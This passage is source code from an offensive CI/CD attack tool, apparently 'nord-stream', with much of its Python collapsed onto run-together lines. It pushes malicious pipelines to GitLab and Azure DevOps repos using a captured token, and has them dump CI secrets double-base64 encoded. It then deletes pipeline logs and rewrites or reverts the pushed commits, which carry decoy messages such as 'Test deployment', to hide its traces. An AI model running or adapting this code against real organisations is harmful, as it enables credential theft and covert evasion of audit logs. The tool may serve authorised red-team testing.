__resetBranchProtectionRules(self, repo, protections): logger.warning("Restoring branch protection.") data = {} data["required_status_checks"] = resetRequiredStatusCheck(protections) data["required_pull_request_reviews"] = resetRequiredPullRequestReviews(protections) data["restrictions"] = resetRestrictions(protections) data["enforce_admins"] = protections.get("enforce_admins").get("enabled") data["allow_deletions"] = protections.get("allow_deletions").get("enabled") data["allow_force_pushes"] = protections.get("allow_force_pushes").get("enabled") data["block_creations"] = protections.get("block_creations").get("enabled") res = self._cicd.updateBranchesProtectionRules(repo, data) msg = res.get("message") if msg: logger.error(f"Failed to restore protection: {msg}") logger.info(f"Raw protections: {protections}")
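# Illustrative shape of the restore payload assembled by
# __resetBranchProtectionRules() above, assuming a protection with admin
# enforcement and a single required status check (all values are made up;
# see the reset* helpers in nordstream/core/github/protections.py below):
data = {
    "required_status_checks": {"strict": True, "contexts": ["ci/build"]},
    "required_pull_request_reviews": {"required_approving_review_count": 1},
    "restrictions": None,  # resetRestrictions() returns None when unset
    "enforce_admins": True,
    "allow_deletions": False,
    "allow_force_pushes": False,
    "block_creations": False,
}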
================================================ FILE: nordstream/core/github/protections.py ================================================ from collections import defaultdict def resetRequiredStatusCheck(protections): res = defaultdict(dict) required_status_checks = protections.get("required_status_checks") if required_status_checks: res["strict"] = required_status_checks.get("strict") res["contexts"] = required_status_checks.get("contexts") if required_status_checks.get("checks"): res["checks"] = required_status_checks.get("checks") return dict(res) else: return None def resetRequiredPullRequestReviews(protections): res = defaultdict(dict) required_pull_request_reviews = protections.get("required_pull_request_reviews") if required_pull_request_reviews: if required_pull_request_reviews.get("dismissal_restrictions"): res["dismissal_restrictions"]["users"] = getUsersArray( required_pull_request_reviews.get("dismissal_restrictions").get("users") ) res["dismissal_restrictions"]["teams"] = getTeamsOrAppsArray( required_pull_request_reviews.get("dismissal_restrictions").get("teams") ) res["dismissal_restrictions"]["apps"] = getTeamsOrAppsArray( required_pull_request_reviews.get("dismissal_restrictions").get("apps") ) if required_pull_request_reviews.get("dismiss_stale_reviews"): res["dismiss_stale_reviews"] = required_pull_request_reviews.get("dismiss_stale_reviews") if required_pull_request_reviews.get("require_code_owner_reviews"): res["require_code_owner_reviews"] = required_pull_request_reviews.get("require_code_owner_reviews") if required_pull_request_reviews.get("required_approving_review_count"): res["required_approving_review_count"] = required_pull_request_reviews.get( "required_approving_review_count" ) if required_pull_request_reviews.get("require_last_push_approval"): res["require_last_push_approval"] = required_pull_request_reviews.get("require_last_push_approval") if required_pull_request_reviews.get("bypass_pull_request_allowances"): res["bypass_pull_request_allowances"]["users"] = getUsersArray( required_pull_request_reviews.get("bypass_pull_request_allowances").get("users") ) res["bypass_pull_request_allowances"]["teams"] = getTeamsOrAppsArray( required_pull_request_reviews.get("bypass_pull_request_allowances").get("teams") ) res["bypass_pull_request_allowances"]["apps"] = getTeamsOrAppsArray( required_pull_request_reviews.get("bypass_pull_request_allowances").get("apps") ) return dict(res) else: return None def resetRestrictions(protections): res = defaultdict(dict) restrictions = protections.get("restrictions") if restrictions: res["users"] = getUsersArray(restrictions.get("users")) res["teams"] = getTeamsOrAppsArray(restrictions.get("teams")) res["apps"] = getTeamsOrAppsArray(restrictions.get("apps")) return dict(res) else: return None def getUsersArray(users): res = [] for user in users:
res.append(user.get("login")) return res def getTeamsOrAppsArray(data): res = [] for e in data: res.append(e.get("slug")) return res ================================================ FILE: nordstream/core/gitlab/gitlab.py ================================================ import logging from urllib.parse import urlparse from os import makedirs, chdir from os.path import exists, realpath from datetime import datetime from nordstream.utils.log import logger from nordstream.git import Git import subprocess import time from nordstream.utils.errors import GitLabError from nordstream.yaml.gitlab import GitLabPipelineGenerator class GitLabRunner: _cicd = None _writeAccessFilter = False _extractProject = True _extractGroup = True _extractInstance = True _yaml = None _branchAlreadyExists = False _fileName = None _cleanLogs = True _sleepTime = 0 _localPath = None @property def writeAccessFilter(self): return self._writeAccessFilter @writeAccessFilter.setter def writeAccessFilter(self, value): self._writeAccessFilter = value @property def extractProject(self): return self._extractProject @extractProject.setter def extractProject(self, value): self._extractProject = value @property def extractGroup(self): return self._extractGroup @extractGroup.setter def extractGroup(self, value): self._extractGroup = value @property def extractInstance(self): return self._extractInstance @extractInstance.setter def extractInstance(self, value): self._extractInstance = value @property def yaml(self): return self._yaml @yaml.setter def yaml(self, value): self._yaml = realpath(value) @property def branchAlreadyExists(self): return self._branchAlreadyExists @branchAlreadyExists.setter def branchAlreadyExists(self, value): self._branchAlreadyExists = value @property def cleanLogs(self): return self._cleanLogs @cleanLogs.setter def cleanLogs(self, value): self._cleanLogs = value @property def sleepTime(self): return self._sleepTime @sleepTime.setter def sleepTime(self, value): self._sleepTime = int(value) @property def localPath(self): return self._localPath @localPath.setter def localPath(self, value): if exists(value): self._localPath = value else: logger.critical("Invalid local project path.") def __init__(self, cicd): self._cicd = cicd self.__createLogDir() def __createLogDir(self): self._cicd.outputDir = realpath(self._cicd.outputDir) + "/gitlab" makedirs(self._cicd.outputDir, exist_ok=True) def getProjects(self, project, strict=False, membership=False): if project: if exists(project): logger.info(f"Getting GitLab projects from a file: {project}") with open(project, "r") as file: for p in file: self._cicd.addProjects( project=p.strip(), filterWrite=self._writeAccessFilter, strict=strict, membership=membership ) else: logger.info(f"Getting GitLab project: {project}") self._cicd.addProjects( project=project, filterWrite=self._writeAccessFilter, strict=strict, membership=membership ) else: logger.info("Listing GitLab projects") self._cicd.addProjects(filterWrite=self._writeAccessFilter, membership=membership) if len(self._cicd.projects) == 0: if self._writeAccessFilter: logger.critical("No project with write access found.") else: logger.critical("No project found.") def getGroups(self, group): if group: if exists(group): logger.info(f"Getting GitLab groups from a file: {group}") with open(group, "r") as file: for p in file: self._cicd.addGroups(p.strip()) else: logger.info(f"Getting GitLab group: {group}") self._cicd.addGroups(group) else: logger.info("Listing GitLab groups") self._cicd.addGroups() if
len(self._cicd.groups) == 0: logger.error("No group found.") def listGitLabRunners(self): logger.info("Listing GitLab runners") res = False if self._extractProject: res |= self.__listGitLabProjectRunners() if not res: logger.warning("You don't have access to any runner or job") def __mergeLists(self, current, new, key): current[key] = list(set(current[key] + new[key])) new[key] = current[key] def __mergeRunners(self, current, new): for runner in new: existing = next((c for c in current if c["id"] == runner["id"]), None) if not existing: current.append(runner) continue date = lambda d: datetime.strptime(d, "%Y-%m-%dT%H:%M:%S.%fZ") self.__mergeLists(existing, runner, "projects") self.__mergeLists(existing, runner, "tags") if date(runner["contacted_at"]) > date(existing["contacted_at"]): existing.update(runner) def __listGitLabProjectRunners(self): res = False runners = [] for project in self._cicd.projects: self.__mergeRunners(runners, self._cicd.listRunnersFromProject(project)) for runner in runners: res = True logger.info( f'{runner["id"]} (scope: {runner["runner_type"].replace("_type", "")}, executor: {runner["executor"]}, accesslevel: {runner["access_level"]})' ) logger.raw(f' - status: {runner["status"].lower()} (lastseen: {runner["contacted_at"]})\n', logging.INFO) logger.raw(f' - description: {runner["description"] or "n/a"}\n', logging.INFO) logger.raw(f' - tags: {runner["tags"]}\n', logging.INFO) logger.raw(f' - platform: {runner["platform"]} ({runner["architecture"]})\n', logging.INFO) logger.raw(f' - ipaddress: {runner["ip_address"]}\n', logging.INFO) if runner["projects"]: logger.raw(f" - projects:\n", logging.INFO) for project in runner["projects"]: logger.raw(f" - {project}\n", logging.INFO) return res def listGitLabSecrets(self): logger.info("Listing GitLab secrets") res = False if self._extractInstance: res |= self.__listGitLabInstanceSecrets() if self._extractGroup: res |= self.__listGitLabGroupSecrets() if self._extractProject: res |= self.__listGitLabProjectSecrets() res |= self.__listGitLabProjectSecureFiles() if not res: logger.warning( "You don't have access to any secret, try to deploy a pipeline and exfiltrate environment variables" ) def __listGitLabProjectSecrets(self): res = False for project in self._cicd.projects: try: time.sleep(self._sleepTime) res |= self.__displayProjectVariables(project) except Exception as e: logger.error(f"Error while listing secrets for {project.get('name')}: {e}") return res def __listGitLabProjectSecureFiles(self): res = False for project in self._cicd.projects: try: time.sleep(self._sleepTime) res |= self.__displayProjectSecureFiles(project) except Exception as e: logger.error(f"Error while listing secure files for {project.get('name')}: {e}") return res def __listGitLabGroupSecrets(self): res = False for group in self._cicd.groups: try: time.sleep(self._sleepTime) res |= self.__displayGroupVariables(group) except Exception as e: logger.error(f"Error while listing secrets for {group.get('name')}: {e}") return res def __listGitLabInstanceSecrets(self): try: return self.__displayInstanceVariables() except Exception as e: logger.error(f"Error while listing instance secrets: {e}") return False def __displayProjectVariables(self, project): projectName = project.get("path_with_namespace") try: variables = self._cicd.listVariablesFromProject(project) if len(variables) != 0: logger.info(f'"{projectName}" project variables') for variable in variables: logger.raw( f'\t- {variable["key"]}={variable["value"]} (protected:{variable["protected"]} / 
hidden:{variable["hidden"]})\n', logging.INFO, ) variables_inherited = self._cicd.listInheritedVariablesFromProject(project) if len(variables_inherited) != 0: logger.info(f'"{projectName}" inherited group variables') for variable in variables_inherited: logger.raw( f'\t- {variable["key"]}={variable["value"]} (protected:{variable["protected"]} / hidden:{variable["hidden"]})\n', logging.INFO, ) if (len(variables) > 0) or (len(variables_inherited) > 0): return True except GitLabError as e: if logger.getEffectiveLevel() < logging.INFO: logger.info(f'"{projectName}" variables') logger.error(f"\t{e}") return False def __displayProjectSecureFiles(self, project): projectName = project.get("path_with_namespace") try: secFiles = self._cicd.listSecureFilesFromProject(project) if len(secFiles) != 0: logger.info(f'"{projectName}" secure files') for file in secFiles: logger.raw(f'\t- {file["name"]} ({file["path"]})\n', logging.INFO) return True except GitLabError as e: if logger.getEffectiveLevel() < logging.INFO: logger.info(f'"{projectName}" secure files') logger.error(f"\t{e}") return False def __displayGroupVariables(self, group): groupPath = group.get("full_path") try: variables = self._cicd.listVariablesFromGroup(group) if len(variables) != 0: logger.info(f'"{groupPath}" group variables:') for variable in variables: logger.raw( f'\t- {variable["key"]}={variable["value"]} (protected:{variable["protected"]} / hidden:{variable["hidden"]})\n', logging.INFO, ) return True except GitLabError as e: if logger.getEffectiveLevel() < logging.INFO: logger.info(f'"{groupPath}" group variables:') logger.error(f"\t{e}") return False def __displayInstanceVariables(self): try: variables = self._cicd.listVariablesFromInstance() if len(variables) != 0: logger.info("Instance variables:") for variable in variables: logger.raw( f'\t- {variable["key"]}={variable["value"]} (protected:{variable["protected"]} / hidden:{variable["hidden"]})\n', logging.INFO, ) return True except GitLabError as e: if logger.getEffectiveLevel() < logging.INFO: logger.info("Instance variables:") logger.error(f"\t{e}") return False def listGitLabProjects(self): logger.info("Listing GitLab projects") for project in self._cicd.projects: repoPath = project.get("path") repoName = project.get("name") repoId = project.get("id") if repoPath != repoName: logger.raw(f'- {project["path_with_namespace"]} / {repoId} ({repoName})\n', level=logging.INFO) else: logger.raw(f'- {project["path_with_namespace"]} / {repoId}\n', level=logging.INFO) def listGitLabUsers(self): logger.info("Listing GitLab users") for user in self._cicd.listUsers(): id = user.get("id") username = user.get("username") email = user.get("email") is_admin = user.get("is_admin") res = f"- {id} {username}" if email is not None: res += f" {email}" if is_admin is not None: res += f" (is_admin: {is_admin})" logger.raw(f"{res}\n", level=logging.INFO) def listGitLabGroups(self): logger.info("Listing GitLab groups") for group in self._cicd.groups: logger.raw(f'- {group["full_path"]}\n', level=logging.INFO) def runPipeline(self): for project in self._cicd.projects: repoPath = project.get("path") repoName = project.get("name") if repoPath != repoName: logger.success(f'"{repoName}" ({repoPath})') else: logger.success(f'"{repoName}"') if self._localPath is None: domain = urlparse(self._cicd.url).netloc if self._cicd.url.startswith("https"): handler = "https" else: handler = "http" url = f"{handler}://foo:{self._cicd.token}@{domain}/{project.get('path_with_namespace')}" Git.gitClone(url) else: repoPath = self._localPath chdir(repoPath) self._pushedCommitsCount = 0 self._branchAlreadyExists = Git.gitRemoteBranchExists(self._cicd.branchName) Git.gitInitialization(self._cicd.branchName, branchAlreadyExists=self._branchAlreadyExists) try: # TODO: branch protections # if not self._forceDeploy: # self.__checkAndDisableBranchProtectionRules(repo) if self._yaml: self.__runCustomPipeline(project) else: logger.error("No YAML file specified.") except KeyboardInterrupt: pass except Exception as e: logger.error(f"Error: {e}") if logger.getEffectiveLevel() == logging.DEBUG: logger.exception(e) finally: self.__clean(project) chdir("../") subprocess.Popen(f"rm -rfd ./{repoPath}", shell=True).wait() logger.info(f"Check output: {self._cicd.outputDir}")
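# runPipeline() aborts with "No YAML file specified." unless a custom pipeline
# file was provided (GitLabPipelineGenerator ships an empty default template).
# A minimal candidate, written here as the Python dict the generator would dump
# to .gitlab-ci.yml (job name and script are illustrative; the double base64
# matches the tool's exfiltration convention):
pipeline = {
    "exfil": {
        "script": ["env | base64 -w0 | base64 -w0", "echo"],
    }
}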
def __runCustomPipeline(self, project): logger.info(f"Running custom pipeline: {self._yaml}") pipelineGenerator = GitLabPipelineGenerator() pipelineGenerator.loadFile(self._yaml) try: pipelineId = self.__launchPipeline(project, pipelineGenerator) if pipelineId: self._fileName = self._cicd.downloadPipelineOutput(project, pipelineId) if self._fileName: self.__extractPipelineOutput(project) logger.empty_line() except Exception as e: logger.error(f"Error: {e}") finally: logger.empty_line() def __launchPipeline(self, project, pipelineGenerator): logger.verbose("Launching pipeline.") projectId = project.get("id") pipelineGenerator.writeFile(".gitlab-ci.yml") pushOutput = Git.gitPush(self._cicd.branchName) pushOutput.wait() pushError = pushOutput.communicate()[1] # communicate() must only be called once try: if b"Everything up-to-date" in pushError.strip(): logger.error("Error when pushing code: Everything up-to-date") logger.warning( "You're trying to push the same code on an existing branch; modify the YAML file to push it." ) elif pushOutput.returncode != 0: logger.error("Error when pushing code:") logger.raw(pushError, logging.INFO) else: self._pushedCommitsCount += 1 logger.raw(pushError) pipelineId, pipelineStatus = self._cicd.waitPipeline(projectId) if pipelineStatus == "success": logger.success("Pipeline has successfully terminated.") return pipelineId elif pipelineStatus == "failed": self.__displayFailureReasons(projectId, pipelineId) return pipelineId except Exception as e: logger.exception(e) def __extractPipelineOutput(self, project, resultsFilename="secrets.txt"): projectPath = project.get("path_with_namespace") with open( f"{self._cicd.outputDir}/{projectPath}/{self._fileName}", "rb", ) as output: pipelineResults = output.read() logger.success("Output:") logger.raw(pipelineResults, logging.INFO) def __clean(self, project): if self._pushedCommitsCount > 0: projectId = project.get("id") if self._cleanLogs: logger.info(f"Cleaning logs for project: {project.get('path_with_namespace')}") self._cicd.cleanAllLogs(projectId) logger.verbose("Cleaning commits.") if self._branchAlreadyExists and self._cicd.branchName != self._cicd.defaultBranchName: Git.gitUndoLastPushedCommits(self._cicd.branchName, self._pushedCommitsCount) else: if not self.__deleteRemoteBranch(): logger.info("Cleaning remote branch.") # remove everything if we can't delete the branch (leave one file, otherwise the push would delete the branch itself) Git.gitCleanRemote(self._cicd.branchName, leaveOneFile=True) def manualCleanLogs(self): logger.info("Deleting logs") for project in self._cicd.projects: logger.info(f"Cleaning logs for project: {project.get('path_with_namespace')}") self._cicd.cleanAllLogs(project.get("id")) def __deleteRemoteBranch(self): logger.verbose("Deleting remote branch") deleteOutput =
Git.gitDeleteRemote(self._cicd.branchName) deleteOutput.wait() if deleteOutput.returncode != 0: logger.error(f"Error deleting remote branch {self._cicd.branchName}") logger.raw(deleteOutput.communicate()[1], logging.INFO) return False return True def describeToken(self): response = self._cicd.getUser() logger.info("Token information:") username = response.get("username") if username: logger.raw(f"\t- Username: {username}\n", logging.INFO) isAdmin = response.get("is_admin") if isAdmin is None: logger.raw("\t- IsAdmin: False\n", logging.INFO) else: logger.raw(f"\t- IsAdmin: {isAdmin}\n", logging.INFO) email = response.get("email") if email: logger.raw(f"\t- Email: {email}\n", logging.INFO) id = response.get("id") if id: logger.raw(f"\t- Id: {id}\n", logging.INFO) note = response.get("note") if note: logger.raw(f"\t- Note: {note}\n", logging.INFO) def listBranchesProtectionRules(self): logger.info("Listing branch protection rules.") for project in self._cicd.projects: projectName = project.get("path_with_namespace") logger.info(f"{projectName}:") try: protections = self._cicd.getBranchesProtectionRules(project.get("id")) self.__displayBranchesProtectionRulesPriv(protections) except GitLabError: logger.verbose( "Not enough privileges to get full details on the branch protection rules for this project, trying to get limited information." ) try: branches = self._cicd.getBranches(project.get("id")) self.__displayBranchesProtectionRulesUnpriv(branches) except GitLabError as e: logger.error(f"\t{e}") logger.empty_line() def __displayBranchesProtectionRulesPriv(self, protections): if len(protections) == 0: logger.success("No protection") for protection in protections: name = protection.get("name") logger.info(f'branch: "{name}"') allow_force_push = protection.get("allow_force_push") logger.raw(f"\t- Allow force push: {allow_force_push}\n", logging.INFO) code_owner_approval_required = protection.get("code_owner_approval_required", None) if code_owner_approval_required is not None: logger.raw(f"\t- Code Owner approval required: {code_owner_approval_required}\n", logging.INFO) push_access_levels = protection.get("push_access_levels", []) logger.raw("\t- Push access level:\n", logging.INFO) self.__displayAccessLevel(push_access_levels) unprotect_access_levels = protection.get("unprotect_access_levels", []) logger.raw("\t- Unprotect access level:\n", logging.INFO) self.__displayAccessLevel(unprotect_access_levels) merge_access_levels = protection.get("merge_access_levels", []) logger.raw("\t- Merge access level:\n", logging.INFO) self.__displayAccessLevel(merge_access_levels) def __displayBranchesProtectionRulesUnpriv(self, branches): for branch in branches: isProtected = branch.get("protected") if isProtected: name = branch.get("name") logger.info(f'branch: "{name}"') logger.raw("\t- Protected: True\n", logging.INFO) developers_can_push = branch.get("developers_can_push") logger.raw(f"\t- Developers can push: {developers_can_push}\n", logging.INFO) developers_can_merge = branch.get("developers_can_merge") logger.raw(f"\t- Developers can merge: {developers_can_merge}\n", logging.INFO) def __displayAccessLevel(self, access_levels): for al in access_levels: access_level = al.get("access_level", None) user_id = al.get("user_id", None) group_id = al.get("group_id", None) access_level_description = al.get("access_level_description") res = f"\t\t{access_level_description}" if access_level is not None: res += f" (access_level={access_level})" if user_id is not None: res
+= f" (user_id={user_id})" if group_id is not None: res += f" (group_id={group_id})" logger.raw(f"{res}\n", logging.INFO) def __displayFailureReasons(self, projectId, pipelineId): logger.error("Pipeline has failed.") pipelineFailure = self._cicd.getFailureReasonPipeline(projectId, pipelineId) if pipelineFailure: logger.error(f"{pipelineFailure}") else: jobsFailure = self._cicd.getFailureReasonJobs(projectId, pipelineId) for failure in jobsFailure: name = failure["name"] stage = failure["stage"] reason = failure["failure_reason"] logger.raw(f"\t- {name}: {reason} (stage={stage})\n", logging.INFO) ================================================ FILE: nordstream/git.py ================================================ import subprocess from nordstream.utils.log import logger from nordstream.utils.constants import * from nordstream.utils.helpers import randomString """ TODO: find an alternative to subprocess; it's a bit crappy. """ class Git: USER = GIT_USER EMAIL = GIT_EMAIL KEY_ID = None ATTACK_COMMIT_MSG = GIT_ATTACK_COMMIT_MSG CLEAN_COMMIT_MSG = GIT_CLEAN_COMMIT_MSG @staticmethod def gitRunCommand(command): try: # debug level if logger.level <= 10: logger.debug(f"Running: {command}") subprocess.run(command, shell=True, check=True) else: subprocess.run(command, shell=True, check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) except subprocess.CalledProcessError: return False return True @classmethod def gitInitialization(cls, branch, branchAlreadyExists=False): logger.verbose("Git init") cls.gitRunCommand(f"git config user.name {cls.USER}") cls.gitRunCommand(f"git config user.email {cls.EMAIL}") if cls.KEY_ID is not None: cls.gitRunCommand(f"git config user.signingkey {cls.KEY_ID}") cls.gitRunCommand("git config commit.gpgsign true") if branchAlreadyExists: cls.gitRunCommand(f"git checkout {branch}") return cls.gitRunCommand(f"git checkout --orphan {branch}") cls.gitRunCommand(f"git pull origin {branch}") cls.gitRunCommand("git rm . -rf") @classmethod def gitCleanRemote(cls, branch, leaveOneFile=False): logger.verbose("Cleaning remote branch") cls.gitRunCommand("git rm . -rf") cls.gitRunCommand("git rm .github/ -rf") if leaveOneFile: fileName = randomString(5) + "_test_dev.txt" cls.gitRunCommand(f"echo {fileName} > {fileName}") cls.gitRunCommand("git add -A") cls.gitRunCommand(f"git commit -m '{cls.CLEAN_COMMIT_MSG}'") if leaveOneFile: cls.gitRunCommand(f"git push origin {branch}") else: cls.gitRunCommand(f"git push -d origin {branch}") @classmethod def gitRemoteBranchExists(cls, branch): logger.verbose("Checking if remote branch exists") return cls.gitRunCommand(f"git ls-remote --exit-code origin {branch}")
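# gitRemoteBranchExists() leans on `git ls-remote --exit-code origin <branch>`,
# which exits 0 when the ref exists on the remote and 2 when it does not.
# Standalone equivalent (branch name taken from constants.py):
import subprocess

exists = (
    subprocess.run(
        "git ls-remote --exit-code origin dev_remote_ea5Eu/test/v1",
        shell=True,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
    ).returncode
    == 0
)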
@classmethod def gitUndoLastPushedCommits(cls, branch, pushedCommitsCount): for _ in range(pushedCommitsCount): cls.gitRunCommand("git reset --hard HEAD~") if pushedCommitsCount and not cls.gitRunCommand(f"git push -f origin {branch}"): logger.warning( "Could not delete commit(s) pushed by the tool using hard reset and force push. Trying to revert commits." ) cls.gitRunCommand("git pull") cls.gitRunCommand(f"git revert --no-commit HEAD~{pushedCommitsCount}..") cls.gitRunCommand(f"git commit -m '{cls.CLEAN_COMMIT_MSG}'") if pushedCommitsCount and not cls.gitRunCommand(f"git push origin {branch}"): logger.error("Error while trying to revert changes!") @staticmethod def gitDeleteRemote(branch): logger.verbose("Git delete remote.") return subprocess.Popen( f"git push -d origin {branch}", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, ) @classmethod def gitPush(cls, branch): logger.verbose("Pushing to remote branch") cls.gitRunCommand("git add .") cls.gitRunCommand(f"git commit -m '{cls.ATTACK_COMMIT_MSG}'") return subprocess.Popen( f"git push origin {branch}", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, ) @classmethod def gitCreateDummyFile(cls, file): cls.gitRunCommand(f"echo '{file}' > {file}") @classmethod def gitDiffFile(cls, file): return subprocess.Popen( f"git diff HEAD -- {file}", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, ) @classmethod def gitMvFile(cls, src, dest): cls.gitRunCommand(f"mv {src} {dest}") @classmethod def gitCpFile(cls, src, dest): cls.gitRunCommand(f"cp {src} {dest}") @classmethod def gitCreateDir(cls, directory): cls.gitRunCommand(f"mkdir -p {directory}") @staticmethod def gitClone(url): res = subprocess.Popen( f"git clone {url}", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, ) res.wait() if res.returncode == 0: return True elif b"You appear to have cloned an empty repository" in res.communicate()[1].strip(): return True else: return False @staticmethod def gitGetCurrentBranch(): return ( subprocess.Popen( "git rev-parse --abbrev-ref HEAD | tr -d '\n'", shell=True, stdout=subprocess.PIPE, ) .communicate()[0] .decode("UTF-8") ) # not needed anymore @staticmethod def gitIsGlobalUserConfigured(): res = subprocess.Popen( "git config --global user.name", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, ) res.wait() if res.returncode != 0: return False return True # not needed anymore @staticmethod def gitIsGlobalEmailConfigured(): res = subprocess.Popen( "git config --global user.email", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, ) res.wait() if res.returncode != 0: return False return True ================================================ FILE: nordstream/utils/constants.py ================================================ # All constants OUTPUT_DIR = "nord-stream-logs" DEFAULT_BRANCH_NAME = "dev_remote_ea5Eu/test/v1" USER_AGENT = ( "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" ) # GIT constants GIT_USER = "nord-stream" GIT_EMAIL = "nord-stream@localhost.com" GIT_ATTACK_COMMIT_MSG = "Test deployment" GIT_CLEAN_COMMIT_MSG = "Remove test deployment" # GITLAB constants COMPLETED_STATES = ["success", "failed", "canceled", "skipped"] # Azure DevOps DEFAULT_PIPELINE_NAME = "Build_pipeline_58675" DEFAULT_REPO_NAME = "TestDev_ea5Eu" DEFAULT_TASK_NAME = "Task fWQf8" # GitHub DEFAULT_WORKFLOW_FILENAME = "init_ZkITM.yaml" ================================================ FILE: nordstream/utils/devops.py ================================================ import logging from nordstream.cicd.devops import DevOps from nordstream.utils.log import logger def listOrgs(token): try: response = DevOps.getOrgs(token) logger.info("User orgs:") for org in response: logger.raw(f"\t- {org.get('AccountName')}\n", logging.INFO) except Exception as e: logger.error(e)
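# Usage sketch: listOrgs() enumerates every Azure DevOps organization visible
# to a personal access token and prints one "AccountName" per line (the token
# value below is a placeholder).
from nordstream.utils.devops import listOrgs

listOrgs("azure_devops_personal_access_token")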
================================================ FILE: nordstream/utils/errors.py ================================================ class DevOpsError(Exception): pass class GitHubError(Exception): pass class GitHubBadCredentials(Exception): pass class GitLabError(Exception): pass class GitError(Exception): pass class GitPushError(GitError): pass class RepoCreationError(Exception): pass ================================================ FILE: nordstream/utils/helpers.py ================================================ import random, string def isHexadecimal(s): hex_digits = set("0123456789abcdefABCDEF") return all(c in hex_digits for c in s) def isGitLabSessionCookie(s): return isHexadecimal(s) and len(s) == 32 def isAZDOBearerToken(s): return s.startswith("eyJ0") and len(s) > 52 and s.count(".") == 2 def randomString(length): letters = string.ascii_lowercase return "".join(random.choice(letters) for _ in range(length)) def isAllowed(value, sclist, allow=True): if allow: return value in sclist else: return value not in sclist
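# Quick sanity check for the credential-shape helpers above (sample values are
# made up): a GitLab session cookie is 32 hexadecimal characters, and an Azure
# DevOps bearer token is a three-part JWT starting with "eyJ0".
from nordstream.utils.helpers import isGitLabSessionCookie, isAZDOBearerToken

assert isGitLabSessionCookie("0123456789abcdef0123456789abcdef")
assert not isGitLabSessionCookie("not-a-session-cookie")
assert isAZDOBearerToken("eyJ0" + "A" * 60 + ".payload.signature")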
support""" super(NordStreamLog, self).warning( "{}[!]{} {}".format("[bold orange3]", "[/bold orange3]", msg), *args, **kwargs ) def error(self, msg: Any, *args: Any, **kwargs: Any) -> None: """Change default error text format with rich color support""" super(NordStreamLog, self).error("{}[-]{} {}".format("[bold red]", "[/bold red]", msg), *args, **kwargs) def exception(self, msg: Any, *args: Any, **kwargs: Any) -> None: """Change default exception text format with rich color support""" super(NordStreamLog, self).exception("{}[x]{} {}".format("[bold red]", "[/bold red]", msg), *args, **kwargs) def critical(self, msg: Any, *args: Any, **kwargs: Any) -> None: """Change default critical text format with rich color support Add auto exit.""" super(NordStreamLog, self).critical("{}[!]{} {}".format("[bold red]", "[/bold red]", msg), *args, **kwargs) exit(1) def success(self, msg: Any, *args: Any, **kwargs: Any) -> None: """Add success logging method with text format / rich color support""" if self.isEnabledFor(NordStreamLog.SUCCESS): self._log(NordStreamLog.SUCCESS, "{}[+]{} {}".format("[bold green]", "[/bold green]", msg), args, **kwargs) def empty_line(self, log_level: int = logging.INFO) -> None: """Print an empty line.""" self.raw(os.linesep, level=log_level) # Global rich console object console: Console = WhitespaceStrippingConsole() # Main logging default config # Set default Logger class as NordStreamLog logging.setLoggerClass(NordStreamLog) # Add new level to the logging config logging.addLevelName(NordStreamLog.VERBOSE, "VERBOSE") logging.addLevelName(NordStreamLog.SUCCESS, "SUCCESS") # Logging setup using RichHandler and minimalist text format logging.basicConfig( format="%(message)s", handlers=[ RichHandler( rich_tracebacks=True, show_time=False, markup=True, show_level=False, show_path=False, console=console, ) ], ) # Global logger object logger: NordStreamLog = cast(NordStreamLog, logging.getLogger("main")) # Default log level logger.setLevel(logging.INFO) ================================================ FILE: nordstream/yaml/custom.py ================================================ import logging from nordstream.utils.log import logger from nordstream.yaml.generator import YamlGeneratorBase class CustomGenerator(YamlGeneratorBase): def loadFile(self, file): logger.verbose("Loading YAML file.") with open(file, "r") as templateFile: try: self._defaultTemplate = templateFile.read() except Exception as exception: logger.error("[+] Error while reading yaml file") logger.exception(exception) def writeFile(self, file): logger.verbose("Writing YAML file.") if logger.getEffectiveLevel() == logging.DEBUG: logger.debug("Current yaml file:") self.displayYaml() with open(file, "w") as outputFile: outputFile.write(self._defaultTemplate) def displayYaml(self): logger.raw(self._defaultTemplate, logging.INFO) ================================================ FILE: nordstream/yaml/devops.py ================================================ from nordstream.yaml.generator import YamlGeneratorBase from nordstream.utils.constants import DEFAULT_TASK_NAME class DevOpsPipelineGenerator(YamlGeneratorBase): taskName = DEFAULT_TASK_NAME def _get_base_template(self, poolName, os_type): pool = {"name": poolName} if poolName else { "vmImage": "windows-latest" if os_type.lower() == "windows" else "ubuntu-latest" } return { "pool": pool, "trigger": "none", "steps": [] } def _get_ps_b64_script(self, fetch_logic): """Helper to wrap PowerShell variable fetching in Double Base64 encoding.""" return f"""{fetch_logic} if 
($output) {{ $output = $output.TrimEnd("`n", "`r") $base1 = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($output)) $base2 = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($base1)) Write-Host $base2 Write-Host "" }}""" def generatePipelineForSecretExtraction(self, variableGroup, poolName=None, os="linux"): self._defaultTemplate = self._get_base_template(poolName, os) self._defaultTemplate["variables"] = [{"group": variableGroup.get("name")}] secrets = variableGroup.get("variables", []) if os == "windows": secretVars = "" for sec in secrets: key = f"secret_{sec}" value = f"$({sec})" secretVars += f"'{key}'=\"{value}\"\n" fetch_logic = f"""$secret_vars = @{{ {secretVars} }} $output = "" $secret_vars.GetEnumerator() | ForEach-Object {{ $output += "$($_.Key)=$($_.Value)`n" }}""" self._defaultTemplate["steps"].append({ "task": "PowerShell@2", "displayName": self.taskName, "inputs": { "targetType": "inline", "script": self._get_ps_b64_script(fetch_logic) } }) else: env_vars = {f"secret_{sec}": f"$({sec})" for sec in secrets} self._defaultTemplate["steps"].append({ "task": "Bash@3", "displayName": self.taskName, "inputs": { "targetType": "inline", "script": "env -0 | awk -v RS='\\0' '/^secret_/ {print $0}' | base64 -w0 | base64 -w0 ; echo ", }, "env": env_vars, }) def generatePipelineForSecureFileExtraction(self, secureFile, poolName=None, os="linux"): self._defaultTemplate = self._get_base_template(poolName, os) self._defaultTemplate["steps"].append({ "task": "DownloadSecureFile@1", 